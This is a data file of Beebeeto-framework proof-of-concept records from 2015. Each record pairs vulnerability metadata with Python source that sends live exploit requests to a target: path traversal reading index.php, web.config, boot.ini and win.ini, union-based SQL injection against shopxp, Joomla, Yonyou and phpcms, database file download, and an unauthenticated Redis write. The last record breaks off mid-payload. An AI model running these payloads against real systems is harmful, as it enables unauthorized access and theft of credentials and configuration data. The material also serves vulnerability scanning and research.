{"create_date": "2015-10-08 13:54:05", "name": "Joomla /index.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "ximumu", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Joomla,/index.php,com_jetext,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0142',\r\n 'name': 'Joomla /index.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'ximumu',\r\n 'create_date': '2015-10-05',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Joomla', '/index.php', 'com_jetext', 'Arbitrary File Download'],\r\n 'desc': '''\r\n /index.php \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d\uff0c/index.php?option=com_jetext&task=download&\r\n file=[../../index.php] \u5176\u4e2dfile\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6\r\n ''',\r\n 'references': ['https://www.bugscan.net/#!/x/22738',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/index.php?option=com_jetext&task=download&file=../../index.php\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'Id: index.php' in content:\r\n 
args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "/index.php \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d\uff0c/index.php?option=com_jetext&task=download&file=[../../index.php] \u5176\u4e2dfile\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6", "app_name": "Joomla", "id": "poc-2015-0142", "layer4_protocol": null}
{"create_date": "2015-09-25 14:53:15", "name": "\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf /prog/get_composer_att.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "warsong", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0141',\r\n 'name': '\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf /prog/get_composer_att.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'warsong',\r\n 'create_date': '2015-09-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n \u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f\uff0c\u53ef\u81f4\u7cfb\u7edf\u6ca6\u9677\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-066892'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/prog/get_composer_att.php?att_size=1623&filenamepath'\r\n '=C:\\boot.ini&maxatt_sign=4bc882e8c4a98ac7a97acd321aad4f'\r\n '88&attach_filename=boot.ini') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = 
requests.get(verify_url)\r\n if req.status_code == 200 and 'boot.ini' in req.content:\r\n if 'configuration' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u79d1\u4fe1\u90ae\u4ef6\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f\uff0c\u53ef\u81f4\u7cfb\u7edf\u6ca6\u9677\u3002", "app_name": "Other", "id": "poc-2015-0141", "layer4_protocol": null}
{"create_date": "2015-09-21 11:07:47", "name": "shopxp 7.4 /textbox2.asp SQL Injection PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "cflq3", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "shopxp,sql\u6ce8\u5165\u6f0f\u6d1e,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc':{\r\n 'id':'poc-2015-0139',\r\n 'name':'shopxp 7.4 /textbox2.asp SQL Injection PoC',\r\n 'author':'cflq3',\r\n 'create_date':'2015-09-18',\r\n },\r\n 'protocol':{\r\n 'name':'http',\r\n 'port':[80],\r\n 'layer4_protocol':['tcp'],\r\n },\r\n 'vul':{\r\n 'app_name':'shopxp',\r\n 'vul_version':['7.4'],\r\n 'type':'SQL Injection',\r\n 'tag':['shopxp','sql\u6ce8\u5165\u6f0f\u6d1e','asp'],\r\n 'desc':'shopxp 7.4 textbox2.asp sql injection',\r\n 'references':['http://www.sebug.net/vuldb/ssvid-62319'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,MD5(1),4,5,6,7%20from%20shopxp_admin'\r\n verify_url = args['options']['target']+ payload\r\n if args['options']['verbose']:\r\n print '[*]Request URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n if req.getcode()==200:\r\n if 'c4ca4238a0b923820dcc509a6f75849b' in content:\r\n args['success']=True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit=verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "shopxp 7.4 textbox2.asp sql injection", "app_name": "Other", "id": "poc-2015-0139", "layer4_protocol": null}
{"create_date": "2015-09-14 14:31:39", "name": "Joomla /index.php com_memorix SQL \u6ce8\u5165\u6f0f\u6d1e PoC", "level": "\u4e2d\u5371", "batchable": 1, "author": "cflq3", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "joomla \u6f0f\u6d1e,com_memorix,sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info={\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0138',\r\n 'name': 'Joomla /index.php com_memorix SQL \u6ce8\u5165\u6f0f\u6d1e PoC',\r\n 'author': 'cflq3',\r\n 'create_date': '2015-09-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['joomla \u6f0f\u6d1e', 'com_memorix', 'sql injection'],\r\n 'desc': 'Joomla com_memorix component sql injection',\r\n 'references': ['https://www.exploit-db.com/exploits/37773/'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/index.php?option=com_memorix&task=result&searchplugin=theme&'\r\n 'Itemid=60&ThemeID=-8594+union+select+111,222,MD5(1),444,555,66'\r\n '6,777,888,999--+AbuHassan')\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*]Request URL:' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n if 'c4ca4238a0b923820dcc509a6f75849b' in content:\r\n args['success']=True\r\n args['poc_ret']['vul_url']=args['options']['target']\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n 
pprint(mp.run())", "desc": "Joomla com_memorix component sql injection", "app_name": "Joomla", "id": "poc-2015-0138", "layer4_protocol": null}
{"create_date": "2015-09-10 13:26:25", "name": "PageAdmin v3.0 /e/database/v3.mdb \u6570\u636e\u5e93\u53d1\u73b0\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "warsong", "rank": 4, "port": null, "vul_type": "\u6570\u636e\u5e93\u53d1\u73b0", "tag": "PageAdmin v3.0 \u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e POC,/e/database/v3.mdb,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0137',\r\n 'name': 'PageAdmin v3.0 /e/database/v3.mdb \u6570\u636e\u5e93\u53d1\u73b0\u6f0f\u6d1e POC',\r\n 'author': 'warsong',\r\n 'create_date': '2015-09-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PageAdmin',\r\n 'vul_version': ['v3.0'],\r\n 'type': 'Database Found',\r\n 'tag': ['PageAdmin v3.0 \u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e POC', '/e/database/v3.mdb', 'asp'],\r\n 'desc': '''\r\n PageAdmin\u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e \uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-061685'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/e/database/v3.mdb') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 
200:\r\n if 'configuration' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PageAdmin\u6570\u636e\u5e93\u4e0b\u8f7d\u6f0f\u6d1e \uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u3001\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "PageAdmin", "id": "poc-2015-0137", "layer4_protocol": null}
{"create_date": "2015-08-31 13:05:02", "name": "\u7528\u53cb\u81f4\u8fdcA6\u534f\u540c\u7cfb\u7edf /isNotInTable.jsp SQL Injection PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "Sevsea", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u7528\u53cbSQL\u6ce8\u5165\u6f0f\u6d1e,/ext/trafaxserver/ExtnoManage/isNotInTable.jsp \u6f0f\u6d1e,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc':{\r\n 'id':'poc-2015-0133',\r\n 'name':'\u7528\u53cb\u81f4\u8fdcA6\u534f\u540c\u7cfb\u7edf /isNotInTable.jsp SQL Injection PoC',\r\n 'author':'Sevsea',\r\n 'create_date':'2015-08-27',\r\n },\r\n 'protocol':{\r\n 'name':'http',\r\n 'port':'80',\r\n 'layer4_protocol':['tcp'],\r\n },\r\n 'vul':{\r\n 'app_name':'\u7528\u53cb',\r\n 'vul_version':['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u7528\u53cbSQL\u6ce8\u5165\u6f0f\u6d1e', '/ext/trafaxserver/ExtnoManage/isNotInTable.jsp \u6f0f\u6d1e', 'jsp'],\r\n 'desc': '\u7528\u53cb mysql+jsp \u6ce8\u5c04',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-0110312'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls,args):\r\n url = args['options']['target']\r\n verify_url=('%s/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids='\r\n '(17) union all select md5(3.1415)#') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code != 404 and '63e1f04640e83605c1d177544a5a0488' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run(debug=True))", "desc": 
"\u7528\u53cb mysql+jsp \u6ce8\u5c04", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0133", "layer4_protocol": null}
{"create_date": "2015-08-25 14:12:02", "name": "SiteFactory CMS 5.5.9 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "ali", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "SiteFactory,Arbitrary File Download,sitefactory/assets/download.aspx?file=", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\nimport urllib2, urllib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc':{\r\n 'id': 'poc-2015-0130',\r\n 'name': 'SiteFactory CMS 5.5.9 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e PoC',\r\n 'author': 'ali',\r\n 'create_data': '2015-08-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'SiteFactory',\r\n 'vul_versiosn': ['5.5.9'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['SiteFactory', 'Arbitrary File Download', 'sitefactory/assets/download.aspx?file='],\r\n 'desc': 'SiteFactory CMS 5.5.9\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e',\r\n 'references': ['https://www.bugscan.net/#!/x/22441'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/sitefactory/assets/download.aspx?file=c%3a\\windows\\win.ini')\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.urlopen(verify_url)\r\n statecode = urllib.urlopen(verify_url).getcode()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = req.read()\r\n if statecode == 200 and '[fonts]' in content and '[files]' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": 
"SiteFactory CMS 5.5.9\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "app_name": "Other", "id": "poc-2015-0130", "layer4_protocol": null}
{"create_date": "2015-08-18 16:09:02", "name": "\u4e07\u6237ezeip /download.ashx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "warsong", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "\u4e07\u6237\u6f0f\u6d1e,/download.ashx\u6f0f\u6d1e,aspx", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0129',\r\n 'name': '\u4e07\u6237ezeip /download.ashx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'warsong',\r\n 'create_date': '2015-08-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ezeip',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u4e07\u6237\u6f0f\u6d1e', '/download.ashx\u6f0f\u6d1e', 'aspx'],\r\n 'desc': '''\r\n \u4e07\u6237ezeip\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-057764'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/download.ashx?files=../web.config') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = 
requests.get(verify_url)\r\n if req.status_code == 200 and '<?xml version=' in req.content:\r\n if 'configuration' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u4e07\u6237ezeip\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "\u4e07\u6237", "id": "poc-2015-0129", "layer4_protocol": null}
{"create_date": "2015-08-11 14:01:08", "name": "Redis \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "stefan", "rank": 3, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Redis\u8fdc\u7a0b\u8fde\u63a5\u53ef\u5199shell\u6f0f\u6d1e,\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,6379\u7aef\u53e3", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport redis\r\nimport string\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.http import transform_target_ip\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0128',\r\n 'name': 'Redis \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': 'stefan',\r\n 'create_date': '2015-08-07',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'Redis',\r\n 'port': [6379],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Redis',\r\n 'vul_version': ['*'],\r\n 'type': 'Other',\r\n 'tag': ['Redis\u8fdc\u7a0b\u8fde\u63a5\u53ef\u5199shell\u6f0f\u6d1e', '\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '6379\u7aef\u53e3'],\r\n 'desc': '''\r\n Redis\u9ed8\u8ba4\u5b89\u88c5\u540e\u65e0\u9700\u53e3\u4ee4\u53ef\u8fdc\u7a0b\u8fde\u63a5\uff0c\u5e76\u4e14\u53ef\u4ee5\u4f7f\u7528redis\u547d\u4ee4\u66f4\u6539\u5199\u5165\u6587\u4ef6\u7684\u76ee\u5f55\u53ca\u7c7b\u578b\uff0c\r\n \u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002\r\n ''',\r\n 'references': ['http://www.secpulse.com/archives/5357.html',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self):\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type='int', default=6379,\r\n help='this poc 
need the port to connect redis'\r\n 'the default port is 6379.')\r\n @classmethod\r\n def verify(cls, args):\r\n ip_addr = transform_target_ip(args['options']['target'])\r\n p = args['options']['port']\r\n if args['options']['verbose']:\r\n print '[*] Connect Redis: redis-cli -h ' + ip_addr + ' -p' + str(p)\r\n try:\r\n r = redis.Redis(host=ip_addr, port=p, db=0)\r\n ret1 = r.set('name','stefan')\r\n ret2 = r.get('name')\r\n if ret1 & (ret2 in 'stefan'):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = ip_addr + ':' + str(p)\r\n except Exception, e:\r\n if args['options']['verbose']:\r\n print str(e)\r\n args['success'] = False\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Redis\u9ed8\u8ba4\u5b89\u88c5\u540e\u65e0\u9700\u53e3\u4ee4\u53ef\u8fdc\u7a0b\u8fde\u63a5\uff0c\u5e76\u4e14\u53ef\u4ee5\u4f7f\u7528redis\u547d\u4ee4\u66f4\u6539\u5199\u5165\u6587\u4ef6\u7684\u76ee\u5f55\u53ca\u7c7b\u578b\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002", "app_name": "Redis", "id": "poc-2015-0128", "layer4_protocol": null}
{"create_date": "2015-08-10 15:06:14", "name": "phpcms v9 User login /index.php SQL injection POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "ali", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "phpcms v9\u6f0f\u6d1e,sql injection,/index.php?m=menber&c=index&a=login", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc':{\r\n 'id': 'poc-2015-0127',\r\n 'name': 'phpcms v9 User login /index.php SQL injection POC',\r\n 'author': 'ali',\r\n 'create_date': '2015-08-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpcms',\r\n 'vul_versiosn': ['v9'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['phpcms v9\u6f0f\u6d1e', 'sql injection', '/index.php?m=menber&c=index&a=login'],\r\n 'desc': 'phpcms v9\u7528\u6237\u767b\u5f55\u5904\u5b58\u5728sql\u6ce8\u5165\u6f0f\u6d1e',\r\n 'references': ['http://0day5.com/archives/3266'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/index.php?m=menber&c=index&a=login')\r\n verify_url = args['options']['target'] + payload\r\n data = (\"dosubmit=1&username=phpcms&password=123456%26username%3d%2527%2b\"\r\n \"union%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml\"\r\n \"(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)\"\r\n \"%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c\"\r\n \"%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527\"\r\n \"%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527\"\r\n 
